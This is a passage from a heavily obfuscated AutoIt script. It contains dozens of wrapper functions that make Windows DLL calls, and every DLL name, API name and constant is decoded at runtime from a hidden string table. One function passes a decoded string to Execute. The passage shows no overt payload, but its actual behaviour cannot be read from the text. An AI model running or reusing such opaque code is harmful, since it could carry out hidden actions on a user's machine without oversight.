  3259.     DllStructSetData($a4d1c401e56, $a52d2111937, $a17fd105720)
  3260.     Return $a4d1c401e56
  3261. EndFunc
  3262.  
  3263. Func a5a9070374c($a3eca000d54, $a2aca100d54, $a5cad000030, $a4ead104b00)
  3264.     If NOT IsDeclared("SSA5A9070374C") Then
  3265.         Global $a17d2213714 = a2b00005424($os[2829]), $a20d2313448 = a2b00005424($os[2830]), $a33d2414f3b = a2b00005424($os[2831]), $a03d2512f27 = a2b00005424($os[2832]), $a50d2614a0d = a2b00005424($os[2833]), $a39d2710559 = a2b00005424($os[2834]), $a2fd281143a = a2b00005424($os[2835]), $a4bd2911431 = a2b00005424($os[2836])
  3266.         Global $ssa5a9070374c = 1
  3267.     EndIf
  3268.     Local $a505a20190d = DllCall($a17d2213714, $a20d2313448, $a33d2414f3b, $a03d2512f27, $a3eca000d54, $a50d2614a0d, $a2aca100d54, $a39d2710559, $a5cad000030, $a2fd281143a, $a4ead104b00)
  3269.     If @error Then Return SetError(@error, @extended, False)
  3270.     Return $a505a20190d[Number($a4bd2911431)]
  3271. EndFunc
  3272.  
  3273. Func a0b90801a58($a5e02113900)
  3274.     If NOT IsDeclared("SSA0B90801A58") Then
  3275.         Global $a25d2a12356 = a2b00005424($os[2837])
  3276.         Global $ssa0b90801a58 = 1
  3277.     EndIf
  3278.     Return BitAND($a5e02113900, Number($a25d2a12356))
  3279. EndFunc
  3280.  
  3281. Func a4f90900c5c(ByRef $a2f6de02137, ByRef $a4d1c401e56)
  3282.     If NOT IsDeclared("SSA4F90900C5C") Then
  3283.         Global $a05d2b13e13 = a2b00005424($os[2838]), $a31d2c11937 = a2b00005424($os[2839]), $a2bd2d14f34 = a2b00005424($os[2840]), $a57d2e13e35 = a2b00005424($os[2841]), $a5fd2f1533c = a2b00005424($os[2842]), $a1fe2013d21 = a2b00005424($os[2843]), $a48e211010d = a2b00005424($os[2844]), $a0ce2213002 = a2b00005424($os[2845])
  3284.         Global $ssa4f90900c5c = 1
  3285.     EndIf
  3286.     Local $a505a20190d = DllCall($a05d2b13e13, $a31d2c11937, $a2bd2d14f34, $a57d2e13e35, $a2f6de02137, $a5fd2f1533c, $a4d1c401e56)
  3287.     If @error Then Return SetError(Number($a1fe2013d21), @extended, False)
  3288.     Return NOT ($a505a20190d[Number($a48e211010d)] = Number($a0ce2213002))
  3289. EndFunc
  3290.  
  3291. Func a5a90a0204b($a28cec03a24, $a0dde500c4b, $a33e231631e, ByRef $a38e2412c15, $a1960914250 = 0)
  3292.     If NOT IsDeclared("SSA5A90A0204B") Then
  3293.         Global $a49e2513307 = a2b00005424($os[2846]), $a60e2612161 = a2b00005424($os[2847]), $a30e2711951 = a2b00005424($os[2848]), $a38e2811814 = a2b00005424($os[2849]), $a33e2910d4f = a2b00005424($os[2850]), $a4be2a10a39 = a2b00005424($os[2851]), $a54e2b15051 = a2b00005424($os[2852]), $a06e2c12718 = a2b00005424($os[2853]), $a05e2d10359 = a2b00005424($os[2854]), $a5ee2e1455b = a2b00005424($os[2855]), $a5fe2f11c4f = a2b00005424($os[2856])
  3294.         Global $ssa5a90a0204b = 1
  3295.     EndIf
  3296.     Local $a505a20190d = DllCall($a49e2513307, $a60e2612161, $a30e2711951, $a38e2811814, $a28cec03a24, $a33e2910d4f, $a0dde500c4b, $a4be2a10a39, $a33e231631e, $a54e2b15051, Number($a06e2c12718), $a05e2d10359, $a1960914250)
  3297.     If @error Then Return SetError(@error, @extended, False)
  3298.     $a38e2412c15 = $a505a20190d[Number($a5ee2e1455b)]
  3299.     Return $a505a20190d[Number($a5fe2f11c4f)]
  3300. EndFunc
  3301.  
  3302. Func a4590b05057($a598f105931, $a11f2013b50, $a0dde500c4b, $a11de601b14, ByRef $a38e2412c15)
  3303.     If NOT IsDeclared("SSA4590B05057") Then
  3304.         Global $a24f2111258 = a2b00005424($os[2857]), $a63f221591b = a2b00005424($os[2858]), $a07f2315254 = a2b00005424($os[2859]), $a09f2412a4e = a2b00005424($os[2860]), $a46f2510845 = a2b00005424($os[2861]), $a4cf2615554 = a2b00005424($os[2862]), $a19f2713b58 = a2b00005424($os[2863]), $a40f2811e42 = a2b00005424($os[2864]), $a46f2914924 = a2b00005424($os[2865]), $a32f2a11b17 = a2b00005424($os[2866]), $a1af2b10463 = a2b00005424($os[2867])
  3305.         Global $ssa4590b05057 = 1
  3306.     EndIf
  3307.     Local $a505a20190d = DllCall($a24f2111258, $a63f221591b, $a07f2315254, $a09f2412a4e, $a598f105931, $a46f2510845, $a11f2013b50, $a4cf2615554, $a0dde500c4b, $a19f2713b58, $a11de601b14, $a40f2811e42, Number($a46f2914924))
  3308.     If @error Then Return SetError(@error, @extended, False)
  3309.     $a38e2412c15 = $a505a20190d[Number($a32f2a11b17)]
  3310.     Return $a505a20190d[Number($a1af2b10463)]
  3311. EndFunc
  3312.  
  3313. Func a0390c02a16(ByRef $a2f6de02137)
  3314.     If NOT IsDeclared("SSA0390C02A16") Then
  3315.         Global $a0af2c13139 = a2b00005424($os[2868]), $a51f2d1501c = a2b00005424($os[2869]), $a5af2e1330e = a2b00005424($os[2870]), $a58f2f14448 = a2b00005424($os[2871]), $a3703015826 = a2b00005424($os[2872]), $a0503112463 = a2b00005424($os[2873]), $a5903212d5f = a2b00005424($os[2874]), $a0b03314729 = a2b00005424($os[2875])
  3316.         Global $ssa0390c02a16 = 1
  3317.     EndIf
  3318.     Return (DllStructGetData($a2f6de02137, $a0af2c13139) = Number($a51f2d1501c)) AND (DllStructGetData($a2f6de02137, $a5af2e1330e) = Number($a58f2f14448)) AND (DllStructGetData($a2f6de02137, $a3703015826) = Number($a0503112463)) AND (DllStructGetData($a2f6de02137, $a5903212d5f) = Number($a0b03314729))
  3319. EndFunc
  3320.  
  3321. Func a1690d0191e($a3eca000d54, $a2f6de02137 = 0, $a320341622f = 0, $a103d00243d = 5)
  3322.     If NOT IsDeclared("SSA1690D0191E") Then
  3323.         Global $a0903515e0f = a2b00005424($os[2876]), $a1e03615b25 = a2b00005424($os[2877]), $a5b0371145b = a2b00005424($os[2878]), $a2b0381285a = a2b00005424($os[2879]), $a5103910905 = a2b00005424($os[2880]), $a2e03a10412 = a2b00005424($os[2881]), $a1603b12e33 = a2b00005424($os[2882]), $a0f03c14a38 = a2b00005424($os[2883])
  3324.         Global $ssa1690d0191e = 1
  3325.     EndIf
  3326.     Local $a505a20190d = DllCall($a0903515e0f, $a1e03615b25, $a5b0371145b, $a2b0381285a, $a3eca000d54, $a5103910905, $a2f6de02137, $a2e03a10412, $a320341622f, $a1603b12e33, $a103d00243d)
  3327.     If @error Then Return SetError(@error, @extended, False)
  3328.     Return $a505a20190d[Number($a0f03c14a38)]
  3329. EndFunc
  3330.  
  3331. Func a4c90e00d05($a618e001224)
  3332.     If NOT IsDeclared("SSA4C90E00D05") Then
  3333.         Global $a3503d1614d = a2b00005424($os[2884]), $a1103e12d06 = a2b00005424($os[2885]), $a3103f1371f = a2b00005424($os[2886]), $a3213015744 = a2b00005424($os[2887]), $a4c1311375e = a2b00005424($os[2888]), $a251321475e = a2b00005424($os[2889])
  3334.         Global $ssa4c90e00d05 = 1
  3335.     EndIf
  3336.     Local $a505a20190d = DllCall($a3503d1614d, $a1103e12d06, $a3103f1371f, $a3213015744, $a618e001224)
  3337.     If @error Then Return SetError(@error, @extended, Number($a4c1311375e))
  3338.     Return $a505a20190d[Number($a251321475e)]
  3339. EndFunc
  3340.  
  3341. Func a3d90f0471c()
  3342.     If NOT IsDeclared("SSA3D90F0471C") Then
  3343.         Global $a5f1331283c = a2b00005424($os[2890]), $a4213415643 = a2b00005424($os[2891]), $a2f13513509 = a2b00005424($os[2892]), $a0313613a23 = a2b00005424($os[2893])
  3344.         Global $ssa3d90f0471c = 1
  3345.     EndIf
  3346.     Local $a505a20190d = DllCall($a5f1331283c, $a4213415643, $a2f13513509)
  3347.     If @error Then Return SetError(@error, @extended, False)
  3348.     Return $a505a20190d[Number($a0313613a23)]
  3349. EndFunc
  3350.  
  3351. Func a08a0000035($a3eca000d54, $a32ac505260)
  3352.     If NOT IsDeclared("SSA08A0000035") Then
  3353.         Global $a3313712734 = a2b00005424($os[2894]), $a0613815d58 = a2b00005424($os[2895]), $a4f13910603 = a2b00005424($os[2896]), $a2d13a1405c = a2b00005424($os[2897]), $a4e13b13842 = a2b00005424($os[2898]), $a0213c15d5d = a2b00005424($os[2899])
  3354.         Global $ssa08a0000035 = 1
  3355.     EndIf
  3356.     Local $a505a20190d = DllCall($a3313712734, $a0613815d58, $a4f13910603, $a2d13a1405c, $a3eca000d54, $a4e13b13842, $a32ac505260)
  3357.     If @error Then Return SetError(@error, @extended, False)
  3358.     Return $a505a20190d[Number($a0213c15d5d)]
  3359. EndFunc
  3360.  
  3361. Func a46a010220d($a3eca000d54, ByRef $a4d1c401e56)
  3362.     If NOT IsDeclared("SSA46A010220D") Then
  3363.         Global $a2713d11c15 = a2b00005424($os[2900]), $a4313e14813 = a2b00005424($os[2901]), $a1b13f1111e = a2b00005424($os[2902]), $a0223015415 = a2b00005424($os[2903]), $a4423110f34 = a2b00005424($os[2904]), $a0b23214b5e = a2b00005424($os[2905])
  3364.         Global $ssa46a010220d = 1
  3365.     EndIf
  3366.     Local $a505a20190d = DllCall($a2713d11c15, $a4313e14813, $a1b13f1111e, $a0223015415, $a3eca000d54, $a4423110f34, $a4d1c401e56)
  3367.     If @error Then Return SetError(@error, @extended, False)
  3368.     Return $a505a20190d[Number($a0b23214b5e)]
  3369. EndFunc
  3370.  
  3371. Func a34a0202c2c($a32ac505260, $a0723311f21)
  3372.     If NOT IsDeclared("SSA34A0202C2C") Then
  3373.         Global $a1423413c3d = a2b00005424($os[2906]), $a2223510547 = a2b00005424($os[2907]), $a6123613137 = a2b00005424($os[2908]), $a4d23715744 = a2b00005424($os[2909]), $a1523810511 = a2b00005424($os[2910]), $a2423913a1a = a2b00005424($os[2911])
  3374.         Global $ssa34a0202c2c = 1
  3375.     EndIf
  3376.     Local $a505a20190d = DllCall($a1423413c3d, $a2223510547, $a6123613137, $a4d23715744, $a32ac505260, $a1523810511, $a0723311f21)
  3377.     If @error Then Return SetError(@error, @extended, False)
  3378.     Return $a505a20190d[Number($a2423913a1a)]
  3379. EndFunc
  3380.  
  3381. Func a38a0305b1f($a32ac505260, $a346da00151)
  3382.     If NOT IsDeclared("SSA38A0305B1F") Then
  3383.         Global $a3223a15428 = a2b00005424($os[2912]), $a2423b14513 = a2b00005424($os[2913]), $a1823c13f37 = a2b00005424($os[2914]), $a1c23d15d1a = a2b00005424($os[2915]), $a3923e14a00 = a2b00005424($os[2916]), $a2a23f12a4b = a2b00005424($os[2917]), $a0c33010a25 = a2b00005424($os[2918])
  3384.         Global $ssa38a0305b1f = 1
  3385.     EndIf
  3386.     Local $a505a20190d = DllCall($a3223a15428, $a2423b14513, $a1823c13f37, $a1c23d15d1a, $a32ac505260, $a3923e14a00, $a346da00151)
  3387.     If @error Then Return SetError(@error, @extended, -Number($a2a23f12a4b))
  3388.     Return $a505a20190d[Number($a0c33010a25)]
  3389. EndFunc
  3390.  
  3391. Func a08a0403e3b($a32ac505260, $a3733112819)
  3392.     If NOT IsDeclared("SSA08A0403E3B") Then
  3393.         Global $a1133213e16 = a2b00005424($os[2919]), $a1b33310b1a = a2b00005424($os[2920]), $a4233415561 = a2b00005424($os[2921]), $a5e33514635 = a2b00005424($os[2922]), $a1333612215 = a2b00005424($os[2923]), $a513371111b = a2b00005424($os[2924]), $a6333814834 = a2b00005424($os[2925])
  3394.         Global $ssa08a0403e3b = 1
  3395.     EndIf
  3396.     Local $a505a20190d = DllCall($a1133213e16, $a1b33310b1a, $a4233415561, $a5e33514635, $a32ac505260, $a1333612215, $a3733112819)
  3397.     If @error Then Return SetError(@error, @extended, Number($a513371111b))
  3398.     Return $a505a20190d[Number($a6333814834)]
  3399. EndFunc
  3400.  
  3401. Func a47a0500f0f($a3eca000d54)
  3402.     If NOT IsDeclared("SSA47A0500F0F") Then
  3403.         Global $a1e33915413 = a2b00005424($os[2926]), $a5633a14f3f = a2b00005424($os[2927]), $a1f33b15e29 = a2b00005424($os[2928]), $a4b33c14d26 = a2b00005424($os[2929]), $a3333d11c36 = a2b00005424($os[2930]), $a0133e15d5a = a2b00005424($os[2931])
  3404.         Global $ssa47a0500f0f = 1
  3405.     EndIf
  3406.     Local $a505a20190d = DllCall($a1e33915413, $a5633a14f3f, $a1f33b15e29, $a4b33c14d26, $a3eca000d54)
  3407.     If @error Then Return SetError(@error, @extended, Number($a3333d11c36))
  3408.     Return $a505a20190d[Number($a0133e15d5a)]
  3409. EndFunc
  3410.  
  3411. Func a29a0605f2c($a4a33f10030)
  3412.     If NOT IsDeclared("SSA29A0605F2C") Then
  3413.         Global $a4243015720 = a2b00005424($os[2932]), $a4243112641 = a2b00005424($os[2933]), $a0343216329 = a2b00005424($os[2934]), $a354331431d = a2b00005424($os[2935]), $a1043415854 = a2b00005424($os[2936]), $a5243514552 = a2b00005424($os[2937])
  3414.         Global $ssa29a0605f2c = 1
  3415.     EndIf
  3416.     Local $a505a20190d = DllCall($a4243015720, $a4243112641, $a0343216329, $a354331431d, $a4a33f10030)
  3417.     If @error Then Return SetError(@error, @extended, Number($a1043415854))
  3418.     Return $a505a20190d[Number($a5243514552)]
  3419. EndFunc
  3420.  
  3421. Func a30a0702a01($a414361461d)
  3422.     If NOT IsDeclared("SSA30A0702A01") Then
  3423.         Global $a5b43716154 = a2b00005424($os[2938]), $a594381473e = a2b00005424($os[2939]), $a4843915409 = a2b00005424($os[2940]), $a1b43a15350 = a2b00005424($os[2941]), $a2743b1440f = a2b00005424($os[2942])
  3424.         Global $ssa30a0702a01 = 1
  3425.     EndIf
  3426.     Local $a505a20190d = DllCall($a5b43716154, $a594381473e, $a4843915409, $a1b43a15350, $a414361461d)
  3427.     If @error Then Return SetError(@error, @extended, False)
  3428.     Return $a505a20190d[Number($a2743b1440f)]
  3429. EndFunc
  3430.  
  3431. Func a30a0801a53($a32ac505260, $a3c5f80011e, $a135f903427, $a235fa02c16, $a5b9ca02d5a, $a5343c15a59, $a1643d15f3c = 0)
  3432.     If NOT IsDeclared("SSA30A0801A53") Then
  3433.         Global $a0943e13308 = a2b00005424($os[2943]), $a1743f13c3d = a2b00005424($os[2944]), $a2753013a62 = a2b00005424($os[2945]), $a4553111b36 = a2b00005424($os[2946]), $a2353211502 = a2b00005424($os[2947]), $a5053313e0d = a2b00005424($os[2948]), $a055341300b = a2b00005424($os[2949]), $a0153512402 = a2b00005424($os[2950]), $a1553612126 = a2b00005424($os[2951]), $a4f53713321 = a2b00005424($os[2952]), $a1f5381160a = a2b00005424($os[2953])
  3434.         Global $ssa30a0801a53 = 1
  3435.     EndIf
  3436.     Local $a505a20190d = DllCall($a0943e13308, $a1743f13c3d, $a2753013a62, $a4553111b36, $a32ac505260, $a2353211502, $a3c5f80011e, $a5053313e0d, $a135f903427, $a055341300b, $a235fa02c16, $a0153512402, $a5b9ca02d5a, $a1553612126, $a5343c15a59, $a4f53713321, $a1643d15f3c)
  3437.     If @error Then Return SetError(@error, @extended, False)
  3438.     Return $a505a20190d[Number($a1f5381160a)]
  3439. EndFunc
  3440.  
  3441. Func a51a0903902($a28cec03a24)
  3442.     If NOT IsDeclared("SSA51A0903902") Then
  3443.         Global $a1e53915c18 = a2b00005424($os[2954]), $a3853a11f41 = a2b00005424($os[2955]), $a1a53b10e5a = a2b00005424($os[2956]), $a0853c12831 = a2b00005424($os[2957]), $a6153d10727 = a2b00005424($os[2958])
  3444.         Global $ssa51a0903902 = 1
  3445.     EndIf
  3446.     Local $a505a20190d = DllCall($a1e53915c18, $a3853a11f41, $a1a53b10e5a, $a0853c12831, $a28cec03a24)
  3447.     If @error Then Return SetError(@error, @extended, False)
  3448.     Return $a505a20190d[Number($a6153d10727)]
  3449. EndFunc
  3450.  
  3451. Func a51a0a05c26($a3653e14044)
  3452.     If NOT IsDeclared("SSA51A0A05C26") Then
  3453.         Global $a0253f13256 = a2b00005424($os[2959]), $a5e63015c4e = a2b00005424($os[2960]), $a506311061f = a2b00005424($os[2961]), $a0a63212f4c = a2b00005424($os[2962]), $a356331372f = a2b00005424($os[2963])
  3454.         Global $ssa51a0a05c26 = 1
  3455.     EndIf
  3456.     Local $a505a20190d = DllCall($a0253f13256, $a5e63015c4e, $a506311061f, $a0a63212f4c, $a3653e14044)
  3457.     If @error Then Return SetError(@error, @extended, False)
  3458.     Return $a505a20190d[Number($a356331372f)]
  3459. EndFunc
  3460.  
  3461. Func a4ba0b01543($a28cec03a24, $a4263412d62, $a3363514944 = 0)
  3462.     If NOT IsDeclared("SSA4BA0B01543") Then
  3463.         Global $a1263615d44 = a2b00005424($os[2964]), $a4563714e4c = a2b00005424($os[2965]), $a3063810005 = a2b00005424($os[2966]), $a2963914259 = a2b00005424($os[2967]), $a1e63a15e59 = a2b00005424($os[2968]), $a5663b11739 = a2b00005424($os[2969]), $a0e63c12f4a = a2b00005424($os[2970]), $a0863d10109 = a2b00005424($os[2971]), $a1a63e16148 = a2b00005424($os[2972]), $a5163f1024d = a2b00005424($os[2973])
  3464.         Global $ssa4ba0b01543 = 1
  3465.     EndIf
  3466.     Local $a505a20190d = DllCall($a1263615d44, $a4563714e4c, $a3063810005, $a2963914259, $a28cec03a24, $a1e63a15e59, $a4263412d62, $a5663b11739, Number($a0e63c12f4a), $a0863d10109, $a3363514944)
  3467.     If @error Then Return SetError(@error, @extended, -Number($a1a63e16148))
  3468.     Return $a505a20190d[Number($a5163f1024d)]
  3469. EndFunc
  3470.  
  3471. Func a41a0c0085b($a3eca000d54)
  3472.     If NOT IsDeclared("SSA41A0C0085B") Then
  3473.         Global $a337301142a = a2b00005424($os[2974]), $a5e73110e39 = a2b00005424($os[2975]), $a2a73214c0d = a2b00005424($os[2976]), $a2a73314c4b = a2b00005424($os[2977]), $a2873411d5c = a2b00005424($os[2978]), $a007351631e = a2b00005424($os[2979])
  3474.         Global $ssa41a0c0085b = 1
  3475.     EndIf
  3476.     Local $a505a20190d = DllCall($a337301142a, $a5e73110e39, $a2a73214c0d, $a2a73314c4b, $a3eca000d54)
  3477.     If @error Then Return SetError(@error, @extended, Number($a2873411d5c))
  3478.     Return $a505a20190d[Number($a007351631e)]
  3479. EndFunc
  3480.  
  3481. Func a45a0d02659($a3eca000d54, $a3973613553, $a2b73715315 = True)
  3482.     If NOT IsDeclared("SSA45A0D02659") Then
  3483.         Global $a4c7381303e = a2b00005424($os[2980]), $a0d73910531 = a2b00005424($os[2981])
  3484.         Global $ssa45a0d02659 = 1
  3485.     EndIf
  3486.     a3800302b40($a3eca000d54, $a01dae0003d, $a3973613553, $a2b73715315, Number($a4c7381303e), $a0d73910531)
  3487. EndFunc
  3488.  
  3489. Func a3ba0e04a55($a491ca0352d, $a3173a13260, $a103d00243d)
  3490.     If NOT IsDeclared("SSA3BA0E04A55") Then
  3491.         Global $a5873b14830 = a2b00005424($os[2982]), $a2273c1560a = a2b00005424($os[2983]), $a5e73d1240f = a2b00005424($os[2984]), $a2073e1591f = a2b00005424($os[2985]), $a1773f15d29 = a2b00005424($os[2986]), $a098301173e = a2b00005424($os[2987]), $a3e8311342a = a2b00005424($os[2988])
  3492.         Global $ssa3ba0e04a55 = 1
  3493.     EndIf
  3494.     Local $a505a20190d = DllCall($a5873b14830, $a2273c1560a, $a5e73d1240f, $a2073e1591f, $a491ca0352d, $a1773f15d29, $a3173a13260, $a098301173e, $a103d00243d)
  3495.     If @error Then Return SetError(@error, @extended, False)
  3496.     Return $a505a20190d[Number($a3e8311342a)]
  3497. EndFunc
  3498.  
  3499. Func a2ba0f00806($a3eca000d54, $a2bbf603a1e, $a5dbf70404f = 255, $a1d83215d55 = 3, $a4a83313216 = False)
  3500.     If NOT IsDeclared("SSA2BA0F00806") Then
  3501.         Global $a2383412d4a = a2b00005424($os[2989]), $a1783515d0a = a2b00005424($os[2990]), $a0383615827 = a2b00005424($os[2991]), $a438371305e = a2b00005424($os[2992]), $a2f8381030e = a2b00005424($os[2993]), $a2083910e2f = a2b00005424($os[2994]), $a4083a10333 = a2b00005424($os[2995]), $a2583b14d2f = a2b00005424($os[2996]), $a4683c10423 = a2b00005424($os[2997]), $a0283d13211 = a2b00005424($os[2998]), $a3c83e15f42 = a2b00005424($os[2999]), $a2f83f10c17 = a2b00005424($os[3000]), $a509301114d = a2b00005424($os[3001]), $a2393115401 = a2b00005424($os[3002]), $a3093211e3e = a2b00005424($os[3003]), $a579331312f = a2b00005424($os[3004])
  3502.         Global $ssa2ba0f00806 = 1
  3503.     EndIf
  3504.     If $a1d83215d55 = Default OR $a1d83215d55 = "" OR $a1d83215d55 < Number($a2383412d4a) Then $a1d83215d55 = Number($a1783515d0a)
  3505.     If NOT $a4a83313216 Then
  3506.         $a2bbf603a1e = Int(BinaryMid($a2bbf603a1e, Number($a0383615827), Number($a438371305e)) & BinaryMid($a2bbf603a1e, Number($a2f8381030e), Number($a2083910e2f)) & BinaryMid($a2bbf603a1e, Number($a4083a10333), Number($a2583b14d2f)))
  3507.     EndIf
  3508.     Local $a505a20190d = DllCall($a4683c10423, $a0283d13211, $a3c83e15f42, $a2f83f10c17, $a3eca000d54, $a509301114d, $a2bbf603a1e, $a2393115401, $a5dbf70404f, $a3093211e3e, $a1d83215d55)
  3509.     If @error Then Return SetError(@error, @extended, False)
  3510.     Return $a505a20190d[Number($a579331312f)]
  3511. EndFunc
  3512.  
  3513. Func a59b0000f53($a0893411f4f, $a5093511014)
  3514.     If NOT IsDeclared("SSA59B0000F53") Then
  3515.         Global $a2393615c4f = a2b00005424($os[3005]), $a4f9371285b = a2b00005424($os[3006]), $a0693811113 = a2b00005424($os[3007]), $a3793911e3b = a2b00005424($os[3008]), $a2993a13034 = a2b00005424($os[3009]), $a6293b1185e = a2b00005424($os[3010]), $a1493c14207 = a2b00005424($os[3011])
  3516.         Global $ssa59b0000f53 = 1
  3517.     EndIf
  3518.     Local $a505a20190d = DllCall($a2393615c4f, $a4f9371285b, $a0693811113, $a3793911e3b, $a0893411f4f, $a2993a13034, $a5093511014)
  3519.     If @error Then Return SetError(@error, @extended, Number($a6293b1185e))
  3520.     Return $a505a20190d[Number($a1493c14207)]
  3521. EndFunc
  3522.  
  3523. Func a35b0106201($a598f105931, $a3173a13260)
  3524.     If NOT IsDeclared("SSA35B0106201") Then
  3525.         Global $a0593d10d55 = a2b00005424($os[3012]), $a2d93e15c47 = a2b00005424($os[3013]), $a1c93f11911 = a2b00005424($os[3014]), $a21a3012809 = a2b00005424($os[3015]), $a15a3112046 = a2b00005424($os[3016]), $a3ea3214e60 = a2b00005424($os[3017])
  3526.         Global $ssa35b0106201 = 1
  3527.     EndIf
  3528.     Local $a505a20190d = DllCall($a0593d10d55, $a2d93e15c47, $a1c93f11911, $a21a3012809, $a598f105931, $a15a3112046, $a3173a13260)
  3529.     If @error Then Return SetError(@error, @extended, False)
  3530.     Return $a505a20190d[Number($a3ea3214e60)]
  3531. EndFunc
  3532.  
  3533. Func a36b0202344($a1ba3311317, $a51a3415131)
  3534.     If NOT IsDeclared("SSA36B0202344") Then
  3535.         Global $a05a3814646 = a2b00005424($os[3018]), $a32a3910545 = a2b00005424($os[3019]), $a29a3a12e36 = a2b00005424($os[3020]), $a43a3b14713 = a2b00005424($os[3021]), $a57a3c13341 = a2b00005424($os[3022]), $a1ba3e1142f = a2b00005424($os[3023]), $a4ba3f11d52 = a2b00005424($os[3024]), $a0fb3112d45 = a2b00005424($os[3025]), $a17b3213644 = a2b00005424($os[3026]), $a41b3314b3f = a2b00005424($os[3027]), $a61b3413551 = a2b00005424($os[3028]), $a63b3513a3e = a2b00005424($os[3029]), $a43b3613613 = a2b00005424($os[3030]), $a1eb3710c01 = a2b00005424($os[3031]), $a0bb3813a18 = a2b00005424($os[3032]), $a5bb3912c26 = a2b00005424($os[3033]), $a14b3a14405 = a2b00005424($os[3034]), $a36b3b11109 = a2b00005424($os[3035]), $a06b3c14526 = a2b00005424($os[3036]), $a2eb3d12856 = a2b00005424($os[3037]), $a3eb3e10457 = a2b00005424($os[3038]), $a4cb3f12121 = a2b00005424($os[3039]), $a1ac301190c = a2b00005424($os[3040]), $a5ec3111614 = a2b00005424($os[3041]), $a4ec321333d = a2b00005424($os[3042]), $a12c3315608 = a2b00005424($os[3043]), $a3fc3413301 = a2b00005424($os[3044]), $a3ac3512a12 = a2b00005424($os[3045])
  3536.         Global $ssa36b0202344 = 1
  3537.     EndIf
  3538.     Local $a56a3510c00 = IsArray($a1ba3311317), $a58a3611c27 = IsArray($a51a3415131)
  3539.     Local $a4da371431f
  3540.     If NOT $a58a3611c27 AND NOT $a56a3510c00 Then
  3541.         $a4da371431f = Number($a05a3814646)
  3542.     ElseIf $a58a3611c27 OR $a56a3510c00 Then
  3543.         If NOT $a58a3611c27 OR NOT $a56a3510c00 Then Return SetError(-Number($a32a3910545), -Number($a29a3a12e36), False)
  3544.         If UBound($a1ba3311317) <> UBound($a51a3415131) Then Return SetError(-Number($a43a3b14713), -Number($a57a3c13341), False)
  3545.         $a4da371431f = UBound($a1ba3311317)
  3546.     EndIf
  3547.     Local $a41a3d13014 = DllStructCreate($a1ba3e1142f & $a4da371431f & $a4ba3f11d52)
  3548.     Local $a2bb3015c2e = DllStructCreate($a0fb3112d45 & $a4da371431f & $a17b3213644)
  3549.     If NOT $a56a3510c00 Then
  3550.         DllStructSetData($a41a3d13014, $a41b3314b3f, $a1ba3311317, Number($a61b3413551))
  3551.     Else
  3552.         For $a3040c14f22 = Number($a63b3513a3e) To $a4da371431f - Number($a43b3613613)
  3553.             DllStructSetData($a41a3d13014, $a1eb3710c01, $a1ba3311317[$a3040c14f22], $a3040c14f22 + Number($a0bb3813a18))
  3554.         Next
  3555.     EndIf
  3556.     If NOT $a58a3611c27 Then
  3557.         DllStructSetData($a2bb3015c2e, $a5bb3912c26, $a51a3415131, Number($a14b3a14405))
  3558.     Else
  3559.         For $a3040c14f22 = Number($a36b3b11109) To $a4da371431f - Number($a06b3c14526)
  3560.             DllStructSetData($a2bb3015c2e, $a2eb3d12856, $a51a3415131[$a3040c14f22], $a3040c14f22 + Number($a3eb3e10457))
  3561.         Next
  3562.     EndIf
  3563.     Local $a505a20190d = DllCall($a4cb3f12121, $a1ac301190c, $a5ec3111614, $a4ec321333d, $a4da371431f, $a12c3315608, $a41a3d13014, $a3fc3413301, $a2bb3015c2e)
  3564.     If @error Then Return SetError(@error, @extended, False)
  3565.     Return $a505a20190d[Number($a3ac3512a12)]
  3566. EndFunc
  3567.  
  3568. Func a20b030561e($a32ac505260, $a346da00151)
  3569.     If NOT IsDeclared("SSA20B030561E") Then
  3570.         Global $a47c3614202 = a2b00005424($os[3046]), $a59c3710d61 = a2b00005424($os[3047]), $a15c3812c45 = a2b00005424($os[3048]), $a5ec3910b4d = a2b00005424($os[3049]), $a39c3a13605 = a2b00005424($os[3050]), $a45c3b11c0c = a2b00005424($os[3051]), $a0bc3c12862 = a2b00005424($os[3052])
  3571.         Global $ssa20b030561e = 1
  3572.     EndIf
  3573.     Local $a505a20190d = DllCall($a47c3614202, $a59c3710d61, $a15c3812c45, $a5ec3910b4d, $a32ac505260, $a39c3a13605, $a346da00151)
  3574.     If @error Then Return SetError(@error, @extended, -Number($a45c3b11c0c))
  3575.     Return $a505a20190d[Number($a0bc3c12862)]
  3576. EndFunc
  3577.  
  3578. Func a4bb0400203($a3eca000d54, $a577e20612b, $a0cc3d10c21)
  3579.     If NOT IsDeclared("SSA4BB0400203") Then
  3580.         Global $a01c3e1462b = a2b00005424($os[3053]), $a37c3f15207 = a2b00005424($os[3054]), $a20d301095c = a2b00005424($os[3055]), $a10d311094e = a2b00005424($os[3056]), $a0bd3213b11 = a2b00005424($os[3057]), $a1ed3314c48 = a2b00005424($os[3058]), $a3fd3411b1c = a2b00005424($os[3059]), $a25d3512e5a = a2b00005424($os[3060]), $a49d3614709 = a2b00005424($os[3061]), $a3fd3715843 = a2b00005424($os[3062]), $a0ed381084c = a2b00005424($os[3063])
  3581.         Global $ssa4bb0400203 = 1
  3582.     EndIf
  3583.     a5800200106(Number($a01c3e1462b))
  3584.     Local $a5e11f13f2a = $a37c3f15207
  3585.     If Execute($a20d301095c) Then $a5e11f13f2a = $a10d311094e
  3586.     Local $a505a20190d = DllCall($a0bd3213b11, $a1ed3314c48, $a5e11f13f2a, $a3fd3411b1c, $a3eca000d54, $a25d3512e5a, $a577e20612b, $a49d3614709, $a0cc3d10c21)
  3587.     If @error Then Return SetError(@error, @extended, Number($a3fd3715843))
  3588.     Return $a505a20190d[Number($a0ed381084c)]
  3589. EndFunc
  3590.  
  3591. Func a07b050194f($a3eca000d54, $a02d3913657)
  3592.     If NOT IsDeclared("SSA07B050194F") Then
  3593.         Global $a5bd3a14c23 = a2b00005424($os[3064]), $a3fd3b14235 = a2b00005424($os[3065]), $a3dd3c10639 = a2b00005424($os[3066]), $a00d3d11a31 = a2b00005424($os[3067]), $a60d3e12e49 = a2b00005424($os[3068]), $a08d3f12004 = a2b00005424($os[3069])
  3594.         Global $ssa07b050194f = 1
  3595.     EndIf
  3596.     Local $a505a20190d = DllCall($a5bd3a14c23, $a3fd3b14235, $a3dd3c10639, $a00d3d11a31, $a3eca000d54, $a60d3e12e49, $a02d3913657)
  3597.     If @error Then Return SetError(@error, @extended, False)
  3598.     Return $a505a20190d[Number($a08d3f12004)]
  3599. EndFunc
  3600.  
  3601. Func a5ab0605055($a3eca000d54, $a22e3010c2f, $a3f8d803d27, $a568d905c12, $a44e3113148, $a3ee3211e5f, $a103d00243d)
  3602.     If NOT IsDeclared("SSA5AB0605055") Then
